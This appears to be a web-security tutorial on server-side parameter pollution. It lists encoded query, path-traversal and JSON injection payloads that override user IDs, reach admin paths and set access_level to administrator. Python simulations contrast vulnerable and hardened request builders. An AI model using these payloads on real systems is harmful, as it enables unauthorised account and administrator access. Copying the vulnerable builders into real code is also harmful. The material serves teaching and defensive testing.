Server Side Parameter Pollution
Place query syntax characters like #, &, and = in your input and observe how the application responds.
Example:
GET /profile?user=1001%23//evil.com
GET /profile?user=1001%26role=admin
(URL encoded: %23 is #, %26 is &)
GET /profile?user=1001%26admin=true
It's essential that you URL-encode the # character. Otherwise the front-end application will interpret it as a fragment identifier and it won't be passed to the internal API.
GET /userSearch?name=peter&back=/home
1 - Try truncating the query string with an encoded # and injecting a second parameter with an encoded &, then compare the responses with the original request:
GET /userSearch?name=peter%23foo&back=/home
GET /userSearch?name=peter%26foo=xyz&back=/home
2 - If you've identified another parameter the internal API accepts (for example email), you could add it to the query string:
GET /userSearch?name=peter%26email=foo&back=/home
Overriding parameters
Inject a second copy of an existing parameter. Which copy the internal API honours depends on its technology stack (PHP keeps the last, Express keeps the first, ASP.NET concatenates both), so the effect is only visible if the duplicate changes the response:
GET /userSearch?name=peter%26name=carlos&back=/home
GET /profile?user=1001%26user=2121
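To see why these three payloads behave differently, here is an added simulation (example code, not from the original page) of a front-end that concatenates the decoded name into a hypothetical internal endpoint /users/search and of how that internal API's HTTP stack then splits the request. The internal path, the publicProfile parameter and the builder function names are assumptions; the hardened builder percent-encodes the value so #, & and = arrive as data rather than syntax.

```python
from urllib.parse import parse_qs, quote, urlsplit

# Hypothetical internal endpoint the front-end proxies to (assumption, not from the page).
INTERNAL_BASE = "/users/search"


def build_internal_url_vulnerable(name: str) -> str:
    """Front-end concatenates the (already URL-decoded) user input straight into
    the internal request. This is the bug: #, & and = keep their syntax meaning."""
    return f"{INTERNAL_BASE}?name={name}&publicProfile=true"


def build_internal_url_safe(name: str) -> str:
    """Percent-encode the value before concatenating, so every reserved character
    travels as data. quote(..., safe='') encodes '/' as well."""
    return f"{INTERNAL_BASE}?name={quote(name, safe='')}&publicProfile=true"


def internal_api_view(url: str) -> dict:
    """Parse the request the way the internal API's HTTP stack would:
    everything after '#' is a fragment and never reaches the handler,
    the query is split on '&' and '=' and percent-decoded."""
    parts = urlsplit(url)
    return {
        "path": parts.path,
        "params": parse_qs(parts.query, keep_blank_values=True),
        "fragment": parts.fragment,
    }


def probe(name: str, builder=build_internal_url_vulnerable) -> dict:
    """Return the parameter map the internal API ends up with for a given input.
    For duplicated names parse_qs keeps both values; which one a real backend
    honours (first, last, or merged) is stack-specific."""
    return internal_api_view(builder(name))["params"]


if __name__ == "__main__":
    # Inputs as the front-end sees them after decoding %23 -> '#', %26 -> '&'.
    for payload in ("peter#foo", "peter&email=foo", "peter&name=carlos"):
        print(f"{payload!r:25} vulnerable -> {probe(payload)}")
        print(f"{'':25} safe       -> {probe(payload, build_internal_url_safe)}")
```

With the vulnerable builder, `peter#foo` silently drops publicProfile=true (it has become part of the fragment), `peter&email=foo` adds a parameter the user was never meant to control, and `peter&name=carlos` leaves the backend with two name values. The safe builder returns exactly one name parameter in all three cases.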
REST Paths
GET /edit_profile.php?name=peter%2f..%2fadmin
The front-end decodes %2f to / and appends the value to a fixed path, which may result in the following server-side request:
GET /api/private/users/peter/../admin
Whether the dot segment is resolved (so that peter becomes admin) depends on the internal server normalising the path before routing.
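The following is an added example (not code from the original page) of the path case above: a vulnerable builder that appends the decoded name to the /api/private/users/ prefix, a normalisation step standing in for what most HTTP stacks do before routing, and a hardened builder that combines an identifier allowlist with percent-encoding and a post-normalisation prefix check. The allowlist pattern and function names are assumptions.

```python
import posixpath
import re
from urllib.parse import quote

# Internal prefix taken from the example request above; the front-end appends the
# user-supplied name to it (assumption: the page shows the path, not the code).
INTERNAL_PREFIX = "/api/private/users/"

# Allowlist for a user identifier (assumption; tune to the real identifier format).
# '.' is deliberately excluded so that '.' and '..' can never pass on their own.
IDENTIFIER_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def build_profile_path_vulnerable(name: str) -> str:
    """Front-end appends the decoded input (%2f -> '/') with no encoding or checks."""
    return INTERNAL_PREFIX + name


def as_routed_by_backend(path: str) -> str:
    """Most HTTP stacks and reverse proxies collapse dot segments before routing,
    so 'peter/../admin' is routed to the admin resource."""
    return posixpath.normpath(path)


def is_safe_identifier(name: str) -> bool:
    """True when the name matches the allowlist."""
    return IDENTIFIER_RE.fullmatch(name) is not None


def build_profile_path_safe(name: str) -> str:
    """Reject anything outside the allowlist, percent-encode what remains (a literal
    '/' would become %2F rather than a new segment), and verify that the normalised
    path still sits under the expected prefix. The last check is defence in depth:
    some servers decode %2F before routing, so encoding alone is not enough."""
    if not is_safe_identifier(name):
        raise ValueError(f"rejected user identifier: {name!r}")
    path = INTERNAL_PREFIX + quote(name, safe="")
    if as_routed_by_backend(path) != path or not path.startswith(INTERNAL_PREFIX):
        raise ValueError(f"path escapes {INTERNAL_PREFIX}: {path!r}")
    return path


def rejected(name: str) -> bool:
    """True when the hardened builder refuses the identifier."""
    try:
        build_profile_path_safe(name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # 'peter%2f..%2fadmin' arrives at the front-end as 'peter/../admin' after decoding.
    for name in ("peter", "peter/../admin", "..", "peter%2F..%2Fadmin"):
        raw = build_profile_path_vulnerable(name)
        print(f"{name!r:22} vulnerable -> {raw}  routed as {as_routed_by_backend(raw)}")
        print(f"{'':22} hardened   -> {'rejected' if rejected(name) else build_profile_path_safe(name)}")
```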
Structured data
Example 1
POST /myaccount
name=peter
# Server Side:
PATCH /users/7312/update
{"name":"peter"}
You can attempt to add the access_level
parameter to the request as follows:
POST /myaccount
name=peter","access_level":"administrator
If the user input is added to the server-side JSON data without adequate validation or sanitization, the closing quote in the input terminates the name value and the remainder is parsed as JSON syntax, resulting in the following server-side request:
PATCH /users/7312/update
{"name":"peter","access_level":"administrator"}
Example 2
POST /myaccount
{"name": "peter"}
# Server Side
PATCH /users/7312/update
{"name":"peter"}
Add access_level
POST /myaccount
{"name": "peter\",\"access_level\":\"administrator"}
# Server side
PATCH /users/7312/update
{"name":"peter","access_level":"administrator"}
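Both structured-data examples above come from the same defect: the server builds the internal JSON body by string concatenation instead of serialising an object. The following added example (not code from the original page) reproduces Example 1 (form field dropped into a JSON template), Example 2 (outer JSON decoded correctly, decoded string re-embedded unescaped) and the hardened form using json.dumps. The input strings are constructed to mirror the requests above; the builder function names are assumptions.

```python
import json


def build_update_vulnerable_form(name: str) -> str:
    """Example 1: a form field is dropped into a JSON template by concatenation.
    A quote in the input closes the string and the rest is parsed as JSON syntax."""
    return '{"name":"' + name + '"}'


def build_update_vulnerable_json(body: str) -> str:
    """Example 2: the outer JSON body is decoded properly, but the decoded string is
    then re-embedded by concatenation, so the escaped quotes become live quotes."""
    name = json.loads(body)["name"]
    return '{"name":"' + name + '"}'


def build_update_safe(name: str) -> str:
    """Hardened form: let the serializer escape the value. Only the keys this code
    writes can appear in the output, whatever the value contains."""
    return json.dumps({"name": name}, separators=(",", ":"))


def backend_parse(payload: str) -> dict:
    """What the internal PATCH /users/<id>/update handler decodes."""
    return json.loads(payload)


# Constructed inputs mirroring the two requests above.
FORM_INPUT = 'peter","access_level":"administrator'
JSON_BODY = r'{"name": "peter\",\"access_level\":\"administrator"}'


if __name__ == "__main__":
    for label, payload in (
        ("form, concatenated", build_update_vulnerable_form(FORM_INPUT)),
        ("json, re-embedded", build_update_vulnerable_json(JSON_BODY)),
        ("form, serialized", build_update_safe(FORM_INPUT)),
    ):
        print(f"{label:20} {payload}")
        print(f"{'':20} -> {backend_parse(payload)}")
```

Serialising fixes the injection, but it does not decide which fields a user may set; the internal API should additionally accept only an allowlist of fields from this endpoint so that access_level cannot be set even by a legitimately formed request.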
Burp Extension - Backslash Powered Scanner (reports inputs whose responses change when syntax characters are injected, which is a good way to find candidate parameters for this class of bug)